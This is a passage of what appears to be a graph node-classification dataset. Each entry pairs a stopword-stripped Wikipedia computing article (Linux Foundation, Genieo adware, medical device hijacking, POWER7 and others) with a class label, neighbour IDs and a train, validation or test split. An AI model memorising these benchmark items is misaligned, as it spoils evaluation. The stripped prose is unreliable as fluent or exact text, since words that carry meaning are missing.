news widely recognized evidence industry-wide embrace open source software scott guthrie executive vice president microsoft cloud enterprise group explained company excited join linux foundation partner community help developers capitalize shift intelligent cloud mobile experiences linux foundation brought number notable changes open source industry 2017 inaugural open source summit los angeles collection open source guides enterprise created partnership todo group open source managers/executives announced provide transparency new open source projects looking solidify stance strategy staying power event also platform announce foundation chaoss project build platform analyzing open source projects despite rivalry rideshare market uber lyft displayed unity announcing two new projects cloud native computing foundation cncf umbrella open source summit january 23 2018 linux foundation announced six open source networking projects onap opnfv opendaylight fd.io pnda snas would united one umbrella project called lf networking fund lfn arpit joshipura formerly director networking orchestration foundation became executive director lfn heather kirksey formerly director opnfv became linux foundation vp nfv participation lfn voluntary networking projects free decide whether join fund projects continues maintain technical independence linux foundation dedicated building sustainable ecosystems around open source projects accelerate technology development commercial adoption home linux creator linus torvalds lead maintainer greg kroah-hartman provides neutral home linux kernel development protected accelerated years come also fosters innovation hosting collaborative events among linux technical community software developers industry end users solve pressing issues facing linux open source linux foundation supports linux community offering technical information education annual events open source leadership summit linux kernel developers summit open source summit formerly known linuxcon inaugurated september 2009 developer travel fund available introduced october 2017 community data license agreement cdla legal framework sharing data two initial cdla licenses march 3 2009 linux foundation announced would take management linux.com previous owners sourceforge inc site relaunched may 13 2009 shifting away previous incarnation news site become central source linux tutorials information software documentation answers across server desktop/netbook mobile embedded areas also includes directory linux software hardware much like linux linux.com plans rely community create drive content conversation linux foundation training program features instructors content straight leaders linux developer open source communities participants receive linux training vendor-neutral technically advanced created actual leaders linux development community linux foundation linux training courses online in-person events corporate onsite give attendees broad foundational knowledge networking needed thrive careers march 2014 linux foundation edx partnered offer free massive open online class titled introduction linux first series ongoing free offerings organizations whose current catalogue moocs include intro devops intro cloud foundry cloud native software architecture intro apache hadoop intro cloud infrastructure technologies intro openstack december 2015 linux foundation introduced self-paced course designed help prepare administrators openstack foundation certified openstack administrator exam part partnership microsoft announced december 2015 linux azure certification would awarded individuals pass microsoft exam 70-533 implementing microsoft azure infrastructure solutions linux foundation certified system administrator lfcs exam early 2017 annual open source leadership summit announced linux foundation would begin offering inclusive speaker orientation course partnership national center women information technology free course designed give participants practical skills promote inclusivity presentations patent commons consists patented software made available open source community software considered commons patent owner must guarantee developers sued infringement though may restrictions use patented code concept first given substance red hat 2001 published patent promise patent commons project launched november 15 2005 open source development labs osdl core project online patent commons reference library aggregating documenting information patent-related pledges legal solutions directed open-source software community project listed 53 patents linux foundation projects originally collaborative projects independently funded software projects harness power collaborative development fuel innovation across industries ecosystems 500 companies thousands developers around world contribute open source software projects september 2015 total lines source code present linux foundation collaborative projects 115,013,302 estimated total amount effort required retrace steps collaborative development projects 41,192.25 person years words would take 1,356 developers 30 years recreate code bases time total economic value development costs linux foundation collaborative projects estimated 5 billion continued investment open source projects growth number projects hosted number rose 15.6 billion september 2017 projects include alphabetical order alljoyn open source application framework connected devices services formed allseen alliance 2013 project sponsored independent linux foundation project open connectivity foundation ocf automotive grade linux agl collaborative open source project developing linux-based open platform connected car serve de facto standard industry although initially focused in-vehicle infotainment ivi agl roadmap includes instrument cluster heads display telematics autonomous driving goals agl provide june 30 2014 agl announced first release based tizen ivi primarily demo applications agl expanded first reference platform unified code base ucb distribution first ucb release nicknamed agile albacore released january 2016 leverages software components agl tizen genivi alliance ucb 2.0 nicknamed brilliant blowfish made available july 2016 included new features like rear seat display video playback audio routing application framework ucb 3.0 charming chinook released january 2017 agl plans support additional use cases instrument clusters telematics systems cgl workgroup main purpose interface network equipment providers carriers gather requirements produce specifications linux distribution vendors implement also serves use unimplemented requirements foster development projects assist upstream integration requirements cloud foundry open source multi cloud application platform service paas governed cloud foundry foundation 501 c 6 organization january 2015 cloud foundry foundation created independent not-for-profit linux foundation project foundation exists increase awareness adoption cloud foundry grow contributor community create cohesive strategy across member companies foundation serves neutral party holding cloud foundry intellectual property cloud native computing foundation cncf founded 2015 promote containers announced kubernetes 1.0 open source container cluster manager contributed foundation google seed technology founding members included google coreos mesosphere red hat twitter huawei intel cisco ibm docker univa vmware order establish qualified representatives technologies governed cncf program announced inaugural cloudnativeday toronto august 2016 serial entrepreneur dan kohn also helped launch cii project current executive director august 2018 google announced handing operational control project community kubernetes open source framework automating deployment managing applications containerized clustered environment aims provide better ways managing related distributed components across varied infrastructure originally designed google donated linux foundation form cloud native computing foundation kubernetes seed technology large diverse community supporting project made staying power robust older technologies ilk container network interface cni cloud native computing foundation project provides networking linux containers containerd industry-standard core container runtime currently available daemon linux windows manage complete container lifecycle host system 2015 docker donated oci specification linux foundation reference implementation called runc coredns dns server chains plugins cloud native computing foundation member project originally built lyft move architecture away monolith envoy high-performance open source edge service proxy makes network transparent applications lyft contributed envoy cloud native computing foundation september 2017 fluentd open source data collector allowing user unify data collection consumption better use understanding data grpc modern open source high performance rpc framework run environment project formed 2015 google decided open source next version rpc infrastructure stubby project number early large industry adopters square inc. netflix cisco created uber engineering jaeger open source distributed tracing system inspired google dapper paper openzipkin community used tracing microservice-based architectures including distributed context propagation distributed transaction monitoring root cause analysis service dependency analysis performance/latency optimization cloud native computing foundation technical oversight committee voted accept jaeger 12th hosted project september 2017 linkerd cncf member project providing resilient service mesh cloud native applications tool based jvm java virtual machine developers help improve communications among microservices notary open source project allows anyone trust arbitrary collections data opentracing cloud native computing foundation member project offers consistent expressive vendor-neutral apis popular platforms cloud native computing foundation member project prometheus cloud monitoring tool sponsored soundcloud early iterations tool currently used digital ocean ericsson coreos docker red hat google august 2018 tool designated graduated project cloud native computing foundation rkt cloud native computing foundation project pod-native container engine linux composable secure built standards update framework tuf helps developers secure new existing software update systems often found vulnerable many known attacks tuf addresses widespread problem providing comprehensive flexible security framework developers integrate software update system community health analytics open source software chaoss project announced 2017 open source summit north america los angeles overall project aims provide transparency health security metrics open-source projects code aurora forum consortium companies projects serving mobile wireless industry software projects concerns e.g android msm femto linux project llvm msm wlan linux-msm cord central office re-orchestrated datacenter combines sdn nfv cloud commodity infrastructure open building blocks project introduced on.lab june 2015 open networking summit team originally composed linux foundation onos project pmc-sierra sckipio started 2003 core embedded linux project aims provide vendor-neutral place establish core embedded linux technologies beyond linux foundation projects start linux foundation member company allowed apply membership core embedded linux project announced wake heartbleed fund support free open-source software projects critical functioning internet diamon workgroup works toward improving interoperability open source tools improve linux-based tracing profiling logging monitoring features according workgroup diamon aims accelerate development making easier work together common pieces data plane development kit consists libraries accelerate cpu architecture-running packet processing workloads according intel dpdk improve packet processing performance ten times started 2014 dronecode began open source collaborative project unite current future open source drone initiatives auspices linux foundation goal common shared open source stack unmanned aerial vehicles uavs chris anderson ceo 3d robotics founder diy drones serves chairman board directors lorenz meier creator px4 mavlink qgc pixhawk serves community representative board founded 2017 edgex foundry acts vendor-neutral interoperability framework hosted hardware os agnostic reference platform seeks enable ecosystem plug-and-play components uniting marketplace accelerating iot deployment project wants enable collaborators freely work open interoperable iot solutions existing self-created connectivity standards fast data project-referred fido provides io services framework next wave network storage software stack fd.io universal data plane fd.io runs completely user space said ed warnicke consulting engineer cisco chair fd.io technical steering committee fossology primarily project dedicated open source license compliance software system toolkit users able run licenses copyright export control scans command line database web ui provided compliance workflow frrouting frr ip routing protocol suite unix linux platforms incorporates protocol daemons bgp is-is ldp ospf pim rip hyperledger project global open source effort based around advancing cross-industry blockchain technologies addition hosted linux foundation backed finance banking iot supply chain manufacturing technology leaders project foundation fastest growing date boasting 115 members since founding 2016 may 2016 co-founder apache software foundation brian behlendorf joined project executive director io visor open source project community developers enable new way innovate develop share io networking functions advance io networking technologies address new requirements presented cloud computing internet things iot software-defined networking sdn network function virtualization nfv iotivity oss framework enabling seamless device-to-device connectivity aid internet things grows allseen alliance open connectivity foundation merged october 2016 iot projects alljoyn iotivity respectively continue operating linux foundation two projects collaborate support future versions ocf specification single iotivity implementation janusgraph aims continue open source development titandb graph database fork titandb distributed graph database originally released 2012 enable users find connections among large data sets composed billions vertices edges js foundation previously known jquery foundation according by-laws jsfoundation inc aims help development adoption important javascript technology foundation works facilitate collaboration within javascript development community foster javascript applications server-side projects providing best practices policies 2016 dojo foundation merged jquery foundation subsequently rebranded js foundation became linux foundation project notable projects supported js foundation include node-red appium jquery dojo toolkit qunit eslint grunt 2019 js foundation merged node.js foundation form new openjs foundation stated mission foster healthy growth javascript web ecosystem whole kinetic open storage project dedicated creating open source standard around ethernet-enabled key/value kinetic devices accessing drives creating standard expands available ecosystem software hardware systems developers project result alliance including major hard drive manufacturers- seagate toshiba western digital- addition cisco cleversafe dell digitalsense netapp open vstorage red hat scality linux standard base lsb joint project several linux distributions organizational structure linux foundation standardize software system structure filesystem hierarchy used linux operating system lsb based posix specification single unix specification several open standards extends certain areas according lsb lsb compliance may certified product certification procedure lsb specifies example standard libraries number commands utilities extend posix standard layout file system hierarchy run levels printing system including spoolers cups tools like foomatic several extensions x window system ltsi project created/supported hitachi lg electronics nec panasonic qualcomm atheros renesas electronics samsung electronics sony toshiba hosted linux foundation aims maintain common linux base use variety consumer electronics products similar linux foundation overall mission encouraging widespread adoption linux open source technology node.js foundation exists primarily accelerate development node.js platform foundation also operates open governance model heighten participation amongst vendors developers general node.js community structure gives enterprise users assurance innovation continuity without risk since launching 2015 foundation seen strong growth resulting new initiatives node security platform tool allowing continuous security monitoring node.js apps node interactive series professional conferences aimed today average node.js user node.js reports 3.5 million users annual growth rate 100 percent foundation among linux foundation fastest growing projects 2019 node.js foundation merged js foundation form new openjs foundation.. stated mission foster healthy growth javascript web ecosystem whole odpi hosts open source projects accelerate development delivery big data solutions.. aims deliver well-defined open source open data technologies run across distributed devices promotes technologies worldwide certification programs forms marketing onos open network operating system open source community mission bringing promise software-defined networking sdn communications service providers order make networks agile mobile data center applications better economics users providers oai committed standardizing rest apis described smartbear software donated swagger specification directly initiative new name specification openapi specification openbmc project collaborative open-source project whose goal produce open source implementation baseboard management controllers bmc firmware stack openchain project centered around managing enterprise compliance open source supply chains generally project described community effort establish best practices effective management open source software compliance 2015 docker coreos launched oci partnership linux foundation create set industry standards open around container formats runtime opendaylight leading open sdn platform aims accelerate adoption software-defined networking sdn network functions virtualization nfv service provider enterprise research networks openjs foundation founded 2019 merger js foundation node.js foundation stated mission foster healthy growth javascript web ecosystem providing neutral organization host projects collaboratively fund activities benefit ecosystem whole openjs foundation made 29 open source javascript projects including appium dojo jquery node.js webpack founding members included google microsoft ibm paypal godaddy joyent open mainframe project aims drive harmony across mainframe community developed shared tool sets resources project also endeavors heighten participation academic institutions educating mainframe linux engineers developers openmama open middleware agnostic messaging api lightweight vendor-neutral integration layer systems built top variety message-oriented middleware announced october 2017 goal openmessaging act vendor-neutral open standard distributed messaging/stream project supported alibaba verizon oath business unit others openprinting workgroup website belonging linux foundation provides documentation software support printing linux formed linuxprinting.org 2006 became part free standards group developed database lists wide variety printers various manufacturers database allows people give report support quality printer also give report support given linux printer vendor also created foomatic formerly cupsomatic script plugs common unix printing system cups opensds open source software defined storage controller journalist swapnil bhartiya explained cio formed create industry response address software-defined storage integration challenges goal driving enterprise adoption open standards supported storage users/vendors including dell huawei fujitsu hds vodafone oregon state university originally created nicira moving vmware eventually linux foundation ovs open source virtual switch supporting standard management interfaces protocols open network automation platform result open-o open ecomp projects merging april 2017 platform allows end users design manage automate services virtual functions open platform network function virtualization nfv aims carrier-grade integrated platform introduces new products services industry quickly 2016 project began internship program created working group end user advisory group founded users board pnda platform network data analytics platform scalable network analytics rounding data multiple sources network works apache spark crunch numbers order find useful patterns data effectively r consortium dedicated expanding use r language developing r consortium works r foundation organizations working broaden reach language consortium supported collection tech industry heavyweights including microsoft ibm oracle google esri real-time linux overall goal encouraging widespread adoption real time formed coordinate efforts mainline preempt rt assist maintainers continuing development work long-term support future research rt rethinkdb announced shutdown business linux foundation announced purchased intellectual property cloud native computing foundation project relicensed apache license aslv2 rethinkdb describes first open-source scalable json database built ground realtime web software package data exchange spdx project started 2010 create standard format communicating components licenses copyrights associated software packages part project team curates spdx license list defines list identifiers commonly found licenses exceptions used open source collaborative software streaming network analytics system project snas.io open source framework collect track millions routers peers prefixes routing objects real time snas.io linux foundation project announced may 2017 tizen free open-source standards-based software platform supported leading mobile operators device manufacturers silicon suppliers multiple device categories smartphones tablets netbooks in-vehicle infotainment devices smart tvs todo talk openly develop openly open source collective housed linux foundation helps companies interested open source collaborate better efficiently todo aims reach companies organizations want turn best open source projects programs todo group reaches across industries collaborate open source technical business leaders share best practices tools programs building dependable effective projects long term said jim zemlin collaboration summit 2016 xen project team global open source community develops xen hypervisor contributes linux pvops framework xen® cloud platform xen® arm yocto project open source collaboration project provides templates tools methods help create custom linux-based systems embedded products regardless hardware architecture founded 2010 collaboration among many hardware manufacturers open-source operating systems vendors electronics companies bring order chaos embedded linux development zephyr small real-time operating system connected resource-constrained devices supporting multiple architectures developed open source collaboration project released apache license 2.0 zephyr became project linux foundation february 2016 linux kernel community linux foundation hosts infrastructure organizes conferences linux kernel summit linux plumbers conference also hosts technical advisory board made linux kernel developers one developers appointed sit linux foundation board january 2016 linux foundation announced partnership goodwill central texas help hundreds disadvantaged individuals underserved communities variety backgrounds get training need start new lucrative careers linux fund deserving developers accelerate technical problem solving collaboration open source community linux foundation launched community developer travel fund sponsorships open elite community developers proven track record open source development achievement get funding attend technical events employers applications available core infrastructure initiative cii project managed linux foundation enables technology companies industry stakeholders esteemed developers collaboratively identify fund critical open source projects need assistance june 2015 organization announced financial support nearly 500,000 three new projects better support critical security elements global information infrastructure may 2016 cii launched best practice badge program raise awareness development processes project governance steps help projects better security outcomes may 2017 cii issued 100th badge passing project linux foundation open compliance program provides array programs open source software compliance focus initiative educate assist developers companies license requirements order build programs without friction program consists primarily self-administered training modules also meant include automated tools help programmatically identify license compliance issues june 2018 1000 members identify ideals mission linux foundation projects 500 silver members actively donate linux foundation funding linux foundation comes primarily platinum members paying us 500,000 per year according schedule lf bylaws adding us 4 million gold members contribute combined total us 1.6 million smaller members less april 2014 foundation collects annual fees worth least 6,245,000 usd linux foundation uses funds help fund infrastructure fellows including linus torvalds help develop linux kernel december 2018 100 donations received go towards funding diversity programs according organization web site linux foundation events creators maintainers practitioners important open source projects meet linux foundation events 2017 attract nearly 25,000 developers maintainers system administrators thought leaders business executives industry professionals 4,000 organizations across 85 countries many open source projects also co-locate events linux foundation events take advantage cross-community collaboration projects industry 2017 events cover various trends open source including big data cloud native containers iot networking security",
    "neighbors": [
      2560,
      4616,
      2569,
      3082,
      6153,
      5644,
      5139,
      9237,
      10780,
      4637,
      9248,
      10785,
      3618,
      546,
      6180,
      1573,
      9255,
      9257,
      1584,
      8242,
      9266,
      4149,
      9786,
      10303,
      4161,
      10817,
      8772,
      6213,
      5708,
      589,
      1101,
      8268,
      593,
      2134,
      3162,
      2658,
      10851,
      6244,
      5222,
      4200,
      9320,
      10344,
      6763,
      10856,
      4207,
      6255,
      3190,
      5244,
      4734,
      11391,
      7812,
      8326,
      9863,
      7821,
      4238,
      10382,
      657,
      2195,
      2711,
      6808,
      9882,
      6301,
      1694,
      2211,
      2723,
      8355,
      11431,
      8364,
      5295,
      7857,
      6834,
      10933,
      5815,
      2235,
      5822,
      5824,
      11232,
      4803,
      8900,
      1736,
      5833,
      2762,
      1740,
      4301,
      8909,
      6352,
      1746,
      2259,
      3289,
      3802,
      8410,
      10971,
      4831,
      8928,
      1761,
      9441,
      10464,
      2278,
      233,
      4841,
      7403,
      9455,
      5872,
      7920,
      10482,
      2294,
      5879,
      8439,
      2809,
      3323,
      5371,
      9979,
      1280,
      7938,
      4360,
      5386,
      1291,
      4367,
      792,
      1306,
      10016,
      5410,
      295,
      1833,
      815,
      2864,
      7983,
      5430,
      823,
      6968,
      7992,
      318,
      3395,
      9540,
      3911,
      3916,
      6988,
      10063,
      1877,
      4437,
      5975,
      11095,
      4954,
      8539,
      2910,
      863,
      3422,
      2914,
      10091,
      6508,
      7020,
      1394,
      1396,
      7540,
      8573,
      1406,
      3969,
      3458,
      7555,
      900,
      8066,
      3462,
      9602,
      11654,
      5514,
      4493,
      10127,
      11155,
      9621,
      1431,
      8602,
      414,
      9631,
      7584,
      11678,
      1444,
      1445,
      5028,
      935,
      424,
      4521,
      9637,
      4011,
      8621,
      1456,
      9137,
      8627,
      1972,
      8631,
      9660,
      10687,
      9667,
      1990,
      4040,
      457,
      7628,
      2003,
      8147,
      9696,
      2529,
      1506,
      6625,
      8676,
      485,
      2021,
      5095,
      9190,
      1513,
      10732,
      3055,
      5105,
      1524,
      2036,
      5620,
      8186,
      2044
    ],
    "mask": "None"
  },
  {
    "node_id": 4012,
    "label": 6,
    "text": "High_Throughput_File_System:high throughput file system high throughput file system htfs journaling file system used current versions sco openserver successor eafs",
    "neighbors": [
      5120,
      2564,
      6669,
      3598,
      10257,
      9236,
      6677,
      5142,
      8214,
      3611,
      9249,
      9762,
      5158,
      7225,
      11323,
      8772,
      1109,
      4708,
      9836,
      7789,
      9333,
      6263,
      9335,
      9343,
      7818,
      654,
      2193,
      2194,
      2197,
      2199,
      11419,
      6309,
      1190,
      5286,
      10405,
      5293,
      7344,
      2230,
      5816,
      1212,
      8380,
      3265,
      10951,
      9420,
      7378,
      3795,
      4819,
      8402,
      8404,
      728,
      8410,
      6365,
      739,
      7907,
      8938,
      1263,
      3312,
      3826,
      2291,
      246,
      3834,
      3328,
      11012,
      1801,
      2314,
      8461,
      6416,
      1810,
      6935,
      11033,
      287,
      1825,
      6434,
      5413,
      3368,
      4907,
      9004,
      302,
      6961,
      6963,
      1844,
      6970,
      11072,
      3909,
      2378,
      4431,
      5969,
      346,
      2395,
      2397,
      10596,
      2407,
      10087,
      11638,
      6519,
      2424,
      376,
      890,
      11128,
      7554,
      8075,
      7565,
      6545,
      5013,
      11675,
      11676,
      414,
      2974,
      7070,
      10151,
      1454,
      6062,
      8114,
      7603,
      8631,
      1464,
      1978,
      8643,
      7126,
      2015,
      1509,
      9189,
      7663,
      11256,
      2555,
      3582
    ],
    "mask": "Train"
  },
  {
    "node_id": 4013,
    "label": 4,
    "text": "Genieo:genieo genieo innovation israeli company specializing unwanted software includes advertising user tracking software commonly referred potentially unwanted program adware privacy-invasive software grayware malware best known genieo application type also operate installmac distributes additional 'optional search modifying software applications 2014 genieo innovation acquired 34 million somoto another company bundles legitimate applications offers additional third party applications may unwanted user sector israeli software industry frequently referred download valley genieo innovation founded april 2008 sol tzvi jacob tenenboem first version genieo released september 2009 beta version launched demo2010 conference march 2010 genieo website suspected changed name inkeepr software installs onto computers makes almost impossible users remove hijacks user browser tracks browser usage intention mining information users complain acts like virus need run special programs remove genieo listed malware apple inc. xprotect anti-malware service built macintosh computers running mac os x snow leopard later may 2013 malicious installer distributed genieo partner softonic found security software company intego installer masquerades necessary update adobe flash player attempts install genieo.app without user interaction dynamic libraries added safari browser intercept searches intended bing google versions genieo mac also offered 'codecs required video playback testing carried genieo mac june 2013 found left active software behind using supplied uninstaller required detailed manual removal november 2013 another fake application installer reported include genieo adware january 2014 sophos added genieo mac threat list category viruses spyware trojan horse computing adware november 2014 genieo mac flagged intego mentioned according analysis virustotal 25 55 surveyed anti-malware solutions including ad-aware avast bitdefender comodo dr web eset fortinet f-secure kaspersky trend micro housecall sophos symantec july 2014 genieo acquired 34 million somoto another company bundles legitimate applications offers additional third party applications may unwanted user august 2015 malware researchers discovered genieo installer acquired access mac keychain automated click allow permission dialog keychain displayed code safari browser extension added genieo also contained immediately used earlier versions installer april 2019 osx.genieo locked user macbook air computer passwords stored secure note found missing mail account settings tampered genieo case became impetus rapid emergence similar adware search macshop ads macvx etc",
    "neighbors": [
      1664,
      131,
      10756,
      4490,
      10126,
      10392,
      11418,
      2076,
      8615,
      1834,
      9771,
      559,
      7983,
      9908,
      10166,
      7488,
      9537,
      10057,
      1994,
      5069,
      10574,
      2005,
      4310,
      5078,
      5205,
      6231,
      2907,
      7515,
      6237,
      735,
      9055,
      9569,
      10722,
      5605,
      8169,
      9451,
      877,
      8557,
      11000,
      5114,
      4605,
      127
    ],
    "mask": "Validation"
  },
  {
    "node_id": 4014,
    "label": 7,
    "text": "HPCx:hpcx hpcx supercomputer actually cluster ibm eserver p5 575 high-performance servers located daresbury laboratory cheshire england supercomputer maintained hpcx consortium uoe hpcx ltd led university edinburgh epcc science technology facilities council ibm project funded epsrc hpcx service ended january 2010",
    "neighbors": [
      1480,
      3323
    ],
    "mask": "Test"
  },
  {
    "node_id": 4015,
    "label": 4,
    "text": "Electronic_seal:electronic seal electronic seal piece data attached electronic document data ensures data origin integrity term used eu regulation 910/2014 eidas regulation electronic transactions within internal european market conceptually similar electronic signatures usually technically realized digital signatures electronic seals serve evidence electronic document issued specific legal entity purpose electronic seal must linked data sealed way subsequent change data detectable also way fake seal created without access data usually private key used creation digital seal usually achieved use qualified digital certificate involved creation digital seal unique private key used creation digital seal ensures non-repudiation entity created digital seal later deny created seal document document modified digital seal created digital seal valid modified document checked anyone access public key corresponding private key used creation digital seal ensuring integrity sealed document besides authenticating document issued legal entity e-seals also used authenticate digital asset legal person software code servers important difference digital signature electronic seal latter usually created legal person digital signatures created natural person creation digital signature action person signing document data required contrast creation digital seals automatised incorporated processes executed automatically digital environment qualified electronic seal electronic seal compliant eu regulation 910/2014 eidas regulation electronic transactions within internal european market enables verify issuer document long periods time qualified electronic seals considered digital equivalent seals legal entities paper according eidas regulation qualified electronic seal must created qualified electronic device based qualified certificate electronic seal",
    "neighbors": [
      1496,
      8018,
      5200,
      3264
    ],
    "mask": "None"
  },
  {
    "node_id": 4016,
    "label": 4,
    "text": "Medical_device_hijack:medical device hijack medical device hijack also called medjack type cyber attack weakness target medical devices hospital covered extensively press 2015 2016 medjack received additional attention 2017 function increase identified attacks globally research released early year hijacks may endanger patients remote control critical devices theft sensitive data medjack.3 seems additional sophistication designed reveal searches older vulnerable operating systems found embedded within medical devices ability hide sandboxes defense tools safe non vm environment considerable discussion debate topic rsa 2017 event special session medjack.3 debate ensued various medical device suppliers hospital executives audience vendors ownership financial responsibility remediate massive installed base vulnerable medical device equipment notwithstanding discussion fda guidance well intended may go far enough remediate problem mandatory legislation part new national cyber security policy may required address threat medjack sophisticated attacker tools used hospitals new variants ransomware seem targeted hospitals cyberattack attacker places malware within networks variety methods malware laden website targeted email infected usb stick socially engineered access etc malware propagates within network time existing cyber defenses clear attacker tools standard serves workstations endpoints cyber defense software access embedded processors within medical devices embedded operating systems within medical devices running microsoft windows 7 windows xp security operating systems longer supported relatively easy targets establish attacker tools inside medical devices cyber attacker finds safe harbor establish backdoor command control noted since medical devices fda certified hospital cyber security team personnel access internal software without perhsp incurring legal liability impacting operation device violating certification given open access medical devices penetrated attacker free move laterally discover targeted resources ss patient data quietly identified exfiltrated organized crime targets healthcare networks order access steal patient records virtually medical device impacted attack one earliest documented examples testing identified malware tools blood gas analyzer magnetic resonance imaging mri system computerized tomogram ct scan xray machines 2016 case studies became available showed attacker presence also centralized pacs imaging systems vital important hospital operations attack primarily centers largest 6,000 hospitals global basis healthcare data highest value stolen identity data given weakness security infrastructure within hospitals creates accessible highly valuable target cyber thieves besides hospitals impact large physician practices accountable care organizations acos independent physician associations ipas skilled nursing facilities snfs acute care long term surgical centers diagnostic laboratories many reports hospitals hospital organizations getting hacked including ransomware attacks windows xp exploits viruses data breaches sensitive data stored hospital servers various informal assessments estimated medjack currently impacts majority hospitals worldwide remains undetected bulk technologies necessary detect medjack lateral movement attackers command control within targeted medical devices installed great majority hospitals time 3.2.2017 statistic would note hospital 500 beds roughly 15 medical devices usually internet things iot connected per bed addition centralized administration systems hospital diagnostic labs utilized medical devices emr/ehr systems ct/mri/x-ray centers within hospital attacks hard detect even harder remediate deception technology evolution automation honeypot honeygrid networks trap lure attackers move laterally within networks medical devices typically must software reloaded manufacturer hospital security staff equipped able access internals fda approved devices become reinfected quickly takes one medical device potentially re-infect rest hospital 28 december 2016 us food drug administration released recommendations legally enforceable medical device manufacturers maintain security internet-connected devices",
    "neighbors": [
      1251,
      5002,
      4689,
      1970,
      2324,
      7899,
      2558
    ],
    "mask": "Test"
  },
  {
    "node_id": 4017,
    "label": 3,
    "text": "POWER7:power7 power7 family superscalar symmetric multiprocessors based power isa 2.06 instruction set architecture released 2010 succeeded power6 power7 developed ibm several sites including ibm rochester mn austin tx essex junction vt t. j. watson research center ny bromont qc ibm deutschland research development gmbh böblingen germany laboratories ibm announced servers based power7 8 february 2010 ibm 244 million darpa contract november 2006 develop petascale supercomputer architecture end 2010 hpcs project contract also states architecture shall available commercially ibm proposal percs productive easy-to-use reliable computer system contract based power7 processor aix operating system general parallel file system one feature ibm darpa collaborated modifying addressing page table hardware support global shared memory space power7 clusters enables research scientists program cluster single system without using message passing productivity standpoint essential since scientists conversant mpi parallel programming techniques used clusters power7 superscalar symmetric multiprocessor architecture substantial evolution power6 design focusing power efficiency multiple cores simultaneous multithreading smt power6 architecture built ground maximize processor frequency cost power efficiency achieved remarkable 5 ghz power6 features dual-core processor capable two-way simultaneous multithreading smt ibm power 7 processor eight cores four threads per core total capacity 32 simultaneous threads ibm stated isca 29 peak performance achieved high frequency designs 10–20 fo4 delays per pipeline stage cost power efficiency however power6 binary floating-point unit achieves 6-cycle 13-fo4 pipeline therefore pipeline power7 cpu changed power5 power6 designs respects rework similar intel turn 2005 left p4 7th-generation x86 microarchitecture power7 superscalar symmetric multiprocessor available 4 6 8 physical cores per microchip 1 32-way design 1024 smts slightly different microarchitecture interfaces supporting extended/sub-specifications reference power isa and/or different system architectures example supercomputing hpc system power 775 packaged 32-way quad-chip-module qcm 256 physical cores 1024 smts also special turbocore mode turn half cores eight-core processor 4 cores access memory controllers l3 cache increased clock speeds makes core performance higher important workloads require fastest sequential performance cost reduced parallel performance turbocore mode reduce software costs half applications licensed per core increasing per core performance software new ibm power 780 scalable high-end servers featuring new turbocore workload optimizing mode delivering double performance per core power6 based systems core capable four-way simultaneous multithreading smt power7 approximately 1.2 billion transistors 567 mm large fabricated 45 nm process notable difference power6 power7 executes instructions out-of-order instead in-order despite decrease maximum frequency compared power6 4.25 ghz vs 5.0 ghz core higher performance power6 processor 4 times number cores power7 specifications power7 processor core implements aggressive out-of-order ooo instruction execution drive high efficiency use available execution paths power7 processor instruction sequence unit capable dispatching six instructions per cycle set queues eight instructions per cycle issued instruction execution units power7 processor set twelve execution units described gives following theoretical single precision sp performance figures based 4.14 ghz 8 core implementation 4 64-bit simd units per core 128-bit simd vmx unit per core 12 multiply-adds per cycle giving 24 sp fp ops per cycle 4.14 ghz gives 4.14 billion 24 99.36 sp gflops 8 cores 794.88 sp gflops peak double precision dp performance roughly half peak sp performance comparison latest microarchitecture intel haswell came 3 years later power7 16 dp flops 32 sp flops per cycle 8/16 dp/sp fused multiply-add spread across 2× 256 bit avx2 fp vector units 3.4 ghz i7-4770 translates 108.8 sp gflops per core 435.2 sp gflops peak performance across 4-core chip giving roughly similar levels performance per core without taking account effects benefits intel turbo boost technology theoretical peak performance comparison holds practice power7 i7-4770 obtaining similar scores spec cpu2006 floating point benchmarks single-threaded 71.5 power7 versus 74.0 i7-4770 notice power7 chip significantly outperformed 2×–5× i7 benchmarks bwaves cactusadm lbm also significantly slower 2x-3x others indicative major architectural differences two chips mainboards memory systems etc designed different workloads mind however overall broad sense one say floating-point performance power7 similar haswell i7 ibm introduced power7+ processor hot chips 24 conference august 2012 updated version higher speeds cache integrated accelerators manufactured 32 nm fabrication process first boxes ship power7+ processors ibm power 770 780 servers chips 80 mb l3 cache 10 mb/core improved clock speeds 4.4 ghz 20 lpars per core range power7 systems includes express models 710 720 730 740 750 enterprise models 770 780 795 high performance computing models 755 775 enterprise models differ capacity demand capabilities maximum specifications shown table ibm also offers 5 power7 based bladecenters specifications shown table following supercomputer projects use power7 processor",
    "neighbors": [
      6914,
      4868,
      10501,
      3846,
      4743,
      6663,
      5642,
      1548,
      1933,
      398,
      3472,
      4881,
      5393,
      6677,
      407,
      7065,
      1563,
      1309,
      6815,
      3493,
      6949,
      6311,
      8102,
      1321,
      9391,
      10543,
      5297,
      7218,
      10675,
      8120,
      6715,
      9020,
      1725,
      2237,
      1983,
      1985,
      10180,
      1480,
      8523,
      6221,
      336,
      8530,
      2516,
      3540,
      342,
      9302,
      2394,
      1115,
      11613,
      6878,
      1635,
      8931,
      869,
      10214,
      10985,
      5358,
      10734,
      1776,
      3185,
      4211,
      5235,
      1784,
      8058,
      3323,
      8700,
      10111
    ],
    "mask": "Validation"
  },
  {
    "node_id": 4018,
    "label": 1,
    "text": "Australian_Research_Data_Commons:australian research data commons australian research data commons ardc limited company formed 1 july 2018 combining australian national data service ands nectar national eresearch collaboration tools resources research data services rds purpose enable australian researchers industry access nationally significant einfrastructure skills platforms data collections ands established 2008 order help address challenges storing managing making accessible australia research data joint collaboration monash university australian national university csiro manages research data australia web portal enables access data 100 australian research organisations cultural institutions government agencies nectar established 2009 australian government project directorate establish infrastructure university melbourne created 2011 research data services project provides service development prioritised areas research continuing operational support infrastructure accesses data national collections project led monash university collaboration australian national university anu csiro created basis full ands implementation aim allow researchers identify locate access analyse available research data transforming large number scattered disparate collections around australia cohesive accessible body resources importance eresearch infrastructure australian future research competitiveness emphasised prime reason funding provided australian government national collaborative research infrastructure strategy ncris part funding agreement department innovation industry science research diisr monash university september 2008 mid-2009 ands funded education investment fund eif establishment australian research data commons australian government ’ super science initiative research data australia formerly ands collections registry ands significant service web portal enables access data 100 australian research organisations cultural institutions government agencies online research collections australia orca registry software utility drove ands collections registry precursor research data australia used names online discovery service run ands allows researchers publicise existence research data enables prospective users data find research data australia made use iso 2146-based rif-cs metadata standard research data services project continuation research data storage infrastructure rdsi national collaboration tools resources project nectar established 2009 australian government budget part super science initiative financed education investment fund eif since received government funding well similar investment australian universities research institutions project got ground 2011 university melbourne partners research communities develop manage 12 virtual laboratories 16 